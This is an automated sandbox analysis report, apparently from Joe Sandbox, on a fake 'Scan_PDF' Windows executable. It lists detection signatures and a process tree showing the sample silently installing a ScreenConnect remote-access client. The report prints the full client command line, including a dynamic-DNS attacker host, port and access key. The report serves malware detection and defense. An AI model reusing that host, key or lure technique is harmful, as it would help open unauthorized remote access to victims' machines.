Edit tour
Windows
Analysis Report
Scan_PDF_5255303072.exe
Overview
General Information
| Sample name: | Scan_PDF_5255303072.exe |
| Analysis ID: | 1523874 |
| MD5: | 59a8c372735dafb6e20ad3cf30770d8e |
| SHA1: | c9b28e26d40d9d42a7c19c123103f854501a0edb |
| SHA256: | a337a28b1413ed787b4e313cfb04ffef6a4730cddc7543b18b6b8656e65111a0 |
| Tags: | exefiledn-comuser-JAMESWT_MHT |
| Infos: |   |
 | |
Detection
ScreenConnect Tool
| Score: | 46 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Compliance
| Score: | 32 |
| Range: | 0 - 100 |
Signatures
Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Enables network access during safeboot for specific services
Initial sample is a PE file and has a suspicious name
Modifies security policies related information
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Uses dynamic DNS services
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool
Classification
- System is w10x64
Scan_PDF_5255303072.exe (PID: 7868 cmdline: "C:\Users\ user\Deskt op\Scan_PD F_52553030 72.exe" MD5: 59A8C372735DAFB6E20AD3CF30770D8E) 
msiexec.exe (PID: 7972 cmdline: "C:\Window s\System32 \msiexec.e xe" /i "C: \Users\use r\AppData\ Local\Temp \ScreenCon nect\e6cb7 7284cf765a a\setup.ms i" MD5: 0C4BF481F0BE4F7435AD7926338AAA36)
- msiexec.exe (PID: 8028 cmdline:
C:\Windows \system32\ msiexec.ex e /V MD5: 792F0E17B34DE5D3E63064D1EB6FADE1) - msiexec.exe (PID: 8080 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng 08772D9 3E0B8DF49F 1B3D9E4A01 C860E C MD5: 0C4BF481F0BE4F7435AD7926338AAA36) 
rundll32.exe (PID: 8128 cmdline: rundll32.e xe "C:\Use rs\user\Ap pData\Loca l\Temp\MSI 6E42.tmp", zzzzInvoke ManagedCus tomActionO utOfProc S fxCA_48780 46 1 Scree nConnect.I nstallerAc tions!Scre enConnect. ClientInst allerActio ns.FixupSe rviceArgum ents MD5: 889B99C52A60DD49227C5E485A016679) - msiexec.exe (PID: 8184 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng AC03A9C 172D160F64 965C456601 13A3A MD5: 0C4BF481F0BE4F7435AD7926338AAA36) - msiexec.exe (PID: 7340 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng 2A805C4 03B12BA315 C9F95579D7 B0130 E Gl obal\MSI00 00 MD5: 0C4BF481F0BE4F7435AD7926338AAA36)
- ScreenConnect.ClientService.exe (PID: 7460 cmdline:
"C:\Progra m Files (x 86)\Screen Connect Cl ient (e6cb 77284cf765 aa)\Screen Connect.Cl ientServic e.exe" "?e =Access&y= Guest&h=kk l22.ddns.n et&p=8041& s=13ce54a3 -51cc-45e8 -93e2-c37e 596084ea&k =BgIAAACkA ABSU0ExAAg AAAEAAQCpD LJbB2UCJQS T7J%2beAL4 SRxBN9FnGD mzuSSe%2fj H%2bnKBeOQ FHQ%2bCr3L ypD1KSb17o RWP4zVHy7B T585yzIdtE sLOQJGVUwz eIFWaAKwKf BsHG%2fh8G YVt85W1oIV uD0heJmJtq EdcOjXvXPD 4oJuQHoqhB bYLoSnsbfr TP0R040%2b cfkCNslvuf 01cnsbcAey UEFRKIz%2b 8o0YJwrixE 6vdRb5cxn% 2bauV36m92 %2b6%2fhNC 5sRzM45Hr1 FU47wA4rAR a8OnACYafp 32jE3t2Cm7 EEkMt%2bS6 HWKgaZMp0V LkBgPw3WnP 85fhslYN9U z3EZtsBn%2 f97CFE2jSA v4%2brdgIm A3na8&t=sc an_pdf&c=s can_pdf&c= scan_pdf&c =scan_pdf& c=scan_pdf &c=&c=&c=& c=" MD5: 361BCC2CB78C75DD6F583AF81834E447) - ScreenConnect.WindowsClient.exe (PID: 7136 cmdline:
"C:\Progra m Files (x 86)\Screen Connect Cl ient (e6cb 77284cf765 aa)\Screen Connect.Wi ndowsClien t.exe" "Ru nRole" "fc e76b6a-ad5 3-4862-9f4 2-38fab4a2 3da9" "Use r" MD5: 20AB8141D958A58AADE5E78671A719BF) - ScreenConnect.WindowsClient.exe (PID: 980 cmdline:
"C:\Progra m Files (x 86)\Screen Connect Cl ient (e6cb 77284cf765 aa)\Screen Connect.Wi ndowsClien t.exe" "Ru nRole" "dd 836f41-3f5 6-4290-8f8 a-1dd8ba6c 700c" "Sys tem" MD5: 20AB8141D958A58AADE5E78671A719BF)
- svchost.exe (PID: 2492 cmdline:
C:\Windows \System32\ svchost.ex e -k Local Service -p -s Licens eManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| Click to see the 5 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| Click to see the 4 entries | ||||
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||